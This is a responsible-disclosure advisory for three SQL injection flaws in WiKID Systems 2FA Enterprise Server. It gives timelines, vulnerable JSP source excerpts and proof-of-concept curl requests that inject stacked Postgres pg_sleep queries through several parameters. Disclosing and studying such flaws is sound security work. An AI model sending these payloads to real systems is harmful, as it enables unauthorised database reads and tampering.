Author: Aaron Bishop
CVE-2019-16917
A SQL Injection vulnerability, CVE-2019-16917, was identified on WiKID Systems 2FA Enterprise Server through version 4.2.0-b2047. The uid and domain parameters, used by searchDevices.jsp, are not sanitized before being included in a SQL query thus allowing an authenticated user to create, read, update, or delete information in the database.
Patch
Timeline
- 14 Sep 2019 - Issue discovered on
WiKID Systems 2FA Enterprise Server 4.2.0-b2032and disclosed to WiKID Systems. - 26 Sep 2019 - Issue confirmed by WiKID Systems, Patch Released
- 16 Oct 2019 - Public Disclosure
Description
The source code for searchDevices.jsp reveals the buildSearchWhereClause. The uid and domain parameters are retrieved in the buildSearchWhereClause function:
191 private void buildSearchWhereClause(HttpServletRequest request) { 192 where = ""; 193 String uid=request.getParameter("uid") ;194String domain=request.getParameter("domain") ;
domain parameter
If the domain parameter is set and uid parameter is not set, domain is included, in the query allowing SQL injection here:
203 }else if(!domain.equals("0") && uid==null){ 204 where="where domainid="+domain;
If the uid parameter is set, the domain parameter is included, in the query allowing SQL injection here:
205 }else if(uid!=null){ ... 214 if(!domain.equals("0")){ 215 where=where+" and domainid="+domain; 216 } 217 } 218 }
The backend database is Postgres which supports Stacked Queries. A value such as 1; select pg_sleep(10);-- will cause the database and application will hang for 10+ seconds, the original query will execute followed a second query to sleep for 10 seconds:
SLEEP=10; HOST=$RHOST; COOKIE=$COOKIE; time curl -v -i -s -k -X 'POST' -H "Host: $HOST" -H "Cookie: JSESSIONID=$COOKIE;" --data-binary "uid=test&domain=1;select pg_sleep($SLEEP);--&action=Search" https://$HOST/WiKIDAdmin/searchDevices.jsp uid parameter
If the uid parameter is set, the logic drops down to following block where the uid parameter is included in the query:
205 }else if(uid!=null){ 206 uid=uid.toLowerCase().trim(); 207 String ask=uid.substring(uid.length()-1); 208 if(ask!=null ){ 209 // uid=uid.substring(0,uid. length()-1); 210 where="where RTRIM(LOWER(userid)) like LOWER('%"+ uid+"%')"; 211 // }else{ 212 // where="where RTRIM(LOWER(userid))=LOWER('"+uid+"')"; 213 }
A request, such as the following, will trigger the issue, causing the application to delay for 10+ seconds:
SLEEP=10; HOST=$RHOST; COOKIE=$COOKIE; time curl -v -i -s -k -X 'POST' -H "Host: $HOST" -H "Cookie: JSESSIONID=$COOKIE;" --data-binary "uid=1;select pg_sleep($SLEEP);--&action=Search" https://$HOST/WiKIDAdmin/searchDevices.jsp CVE-2019-17117
A SQL Injection vulnerability, CVE-2019-17117, was identified on WiKID Systems 2FA Enterprise Server through version 4.2.0-b2053. The key parameter, used in processPref.jsp, is not sanitized before being included in a SQL query thus allowing an authenticated user to create, read, update, or delete arbitrary information in the database.
Patch
Timeline
- 26 Sep 2019 - Issue discovered on
WiKID Systems 2FA Enterprise Server 4.2.0-b2032 - 29 Sep 2019 - Issue disclosed to WiKID Systems
- 09 Oct 2019 - Issue confirmed by WiKID Systems, Patch released
- 16 Oct 2019 - Public Disclosure
Description
The source code for processPref.jsp reveals the following code block:
121 } else if (request.getParameter("action").equals("Update")) { 122 // need to do error checking here. 123 sql = "SELECT key FROM parms1to1 where key='" + request.getParameter("key")+ "'"; 124 ResultSet result = stat.executeQuery(sql); 125 if (!result.next()) { 126 %>
If the action parameter is set to Update, the key parameter is included in a SQL query used to retrieve the Parameter that will be updated. The key parameter is not sanitized before it is included in the query. A request such as:
https://$RHOST/WiKIDAdmin/processPref.jsp?action=Update&key=test%27;%20SELECT%20pg_sleep(5);-- Will cause the application to delay for at least 5 seconds.
CVE-2019-17119
Multiple SQL Injection vulnerabilities, CVE-2019-17119, were identified on WiKID Systems 2FA Enterprise Server through version 4.2.0-b2053. The substring and source parameters, used by Logs.jsp, are not sanitized before being included in a SQL query thus allowing an authenticated user to create, read, update, or delete arbitrary information in the database.
Patch
Timeline
- 26 Sep 2019 - Issue discovered on
WiKID Systems 2FA Enterprise Server 4.2.0-b2032 - 29 Sep 2019 - Issue disclosed to WiKID Systems
- 09 Oct 2019 - Issue confirmed by WiKID Systems, Patch released
- 16 Oct 2019 - Public Disclosure
Description
The source code for Logs.jsp reveals the following logic:
192 private String createSourceFilter(HttpServletRequest request) {
193 String source = getLogConfig(request).get("source") ;
194 if (source == null || "None".equals(source)) {
195 return " ";
196 }
197 return " and logger_name = '" + source + "' ";
198 }
199
200 private String createSubStringFilter(HttpServletRequest request) {
201 String subString = getLogConfig(request).get("subString") ;
202 if (subString == null || subString.trim().length() == 0) {
203 return " ";
204 }
205 return " and rendered_message like '%" + subString + "%' ";
206 } createSourceFilter reads the source parameter and includes the value in a query being constructed;createSubStringFilter reads the substring parameter and includes the value in a query that is being constructed.
The following queries can be used to demonstrate the parameters are vulnerable, the queries take advantage of Stacked Queries in Postgres; a secondary request is issued that causes the database and application to delay for 5+ seconds:
time curl --output /dev/null -s -k -H "Cookie: JSESSIONID=$COOKIE" --data-binary "source='; select pg_sleep(5);--" https://$RHOST/WiKIDAdmin/Log.jsp
real 0m10.572s
user 0m0.008s
sys 0m0.016s time curl --output /dev/null -s -k -H "Cookie: JSESSIONID=$COOKIE" --data-binary "subString='; select pg_sleep(5);--" https://$RHOST/WiKIDAdmin/Log.jsp
real 0m10.572s
user 0m0.008s
sys 0m0.016s 
